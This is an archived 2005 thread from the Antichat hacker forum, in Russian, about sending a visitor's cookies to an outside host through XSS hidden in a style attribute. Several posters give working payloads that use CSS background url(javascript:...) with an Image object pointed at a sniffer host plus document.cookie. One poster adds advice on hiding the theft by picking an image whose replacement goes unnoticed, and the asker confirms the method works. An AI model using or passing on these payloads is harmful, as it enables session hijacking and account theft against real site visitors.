xss в стилях [Архив] - Форум АНТИЧАТ

Просмотр полной версии : xss в стилях

xPow

23.06.2005, 19:33

вот как реализовать такое:
нужно не выходя из тега, к примеру: <img ......>
передать нужному скрипту кукисы.
т.е. http://example/?document.cookie
!И НЕ ОТКРЫВАТЬ НОВОЕ ОКНО!

KEZ

23.06.2005, 19:44

<img src="http://example/?"+document.cookie>

если ты имеешь ввиду не выходя за кавычку, то так не получится

xPow

23.06.2005, 19:54

не... в стилях
style="здеся"

я имею введу за '>'

Zadoxlik

23.06.2005, 20:21

<img src="http://example/?"+document.cookie>

если ты имеешь ввиду не выходя за кавычку, то так не получится

KEZ, ты ничего не путаешь?

Zadoxlik

23.06.2005, 20:25

не... в стилях
style="здеся"

я имею введу за '>'

<img src="http://sasa" style="background:black url(javascript:document.images[0].src='http://sniffer.ru/snif.gif?'+document.cookie)">

В этом случае самая первая картинка изуродуеется в снифер. Обойти так:
1)либо написать скриптик, котрый создаст новую картинку
2)либо сниффер сделать ввиде той картинки, которая заменится
3)либо выбрать просто не [0] а какуюнить маленькую картинку в теле документа, пропажи/подмены которой не заметно.

KEZ

23.06.2005, 20:37

конечно путаю, я заголовок не прочитал

style=background:url(javascript:i=new Image();i.src='http://example/?'+document.cookie)

можно как Zadoxlik сказал, но не факт что на странице будет images[0]

Че Гевара

23.06.2005, 20:56

Аналогичная тема:
http://forum.antichat.ru/showthread.php?t=6829
Ссылка по теме:
http://antichat.ru/crackchat/HTML

можно как Zadoxlik сказал, но не факт что на странице будет images[0]

Тогда на странице вообще не будет изображений, т.к. первое изображение в хтмл-документе получает 0... А смысл, который подразумевал задохлик как раз в динамической подмене изображения (с помощью скриптовой инъекции)...

Zadoxlik

23.06.2005, 20:59

Kez, я имел ввиду, то что, не кажется ли тебе что твой вариант вообще не сработает?

ЗЫ: изображение палюбэ будет, т.к. мы прописываем энто все в теге имг. Даже если б не было (скажем тег был бы не имг), я написал как пример, что в этом же коде, можно создать изображение.

KEZ

23.06.2005, 21:08

кажется

фишка в том что я вообще не въехал про что тут тема...
извините за тупые ответы

xPow

23.06.2005, 21:24

это не работает

style=background:url(javascript:i=new Image();i.src='http://example/?'+document.cookie)

наверное в стилях нельзя так. потому как

<script>i = new Image(); i.src = "http://example/?"+document.cookie;</script>

работает на ура

и еще... больше надо в теге <font style=...>
нежели в <img ....> :-\

Майор

23.06.2005, 22:22

это работать и не должно, Zadoxlik написал как надо зделать

xPow

24.06.2005, 11:38

ура
все гуд :-)
всем спасибо :)

Майор

30.06.2005, 23:51

это работать и не должно, Zadoxlik написал как надо зделать
это я наврал немного =)
так будет :

style="background:url(javascript:img=new Image()\;img.src='http://example/?'+document.cookie)"